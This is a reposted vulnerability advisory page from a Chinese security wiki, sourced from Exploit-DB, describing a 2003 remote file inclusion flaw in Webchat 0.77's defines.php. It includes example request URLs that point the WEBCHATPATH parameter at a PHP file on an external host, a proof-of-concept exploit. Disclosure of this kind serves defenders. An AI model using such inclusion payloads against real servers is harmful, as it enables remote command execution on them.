Webchat 0.77 – ‘Defines.php’ Remote File Inclusion

Webchat 0.77 – ‘Defines.php’ Remote File Inclusion

漏洞ID 1053737 漏洞类型
发布时间 2003-03-03 更新时间 2003-03-03
图片[1]-Webchat 0.77 – ‘Defines.php’ Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-Webchat 0.77 – ‘Defines.php’ Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22318
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7000/info

Webchat is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.

This vulnerability is as a result of insufficient sanitization performed on remote user-supplied data. Under some circumstances, it is possible for remote attackers to influence the path for certain include files to point to an external file by manipulating URI parameters.

If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/db_mysql.php http://www.example.com/defines.php?WEBCHATPATH=http://www.target.com/language/english.php

相关推荐: ISDN4Linux IPPPD Device String SysLog Format String Vulnerability

ISDN4Linux IPPPD Device String SysLog Format String Vulnerability 漏洞ID 1101684 漏洞类型 Input Validation Error 发布时间 2002-08-10 更新时间 20…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享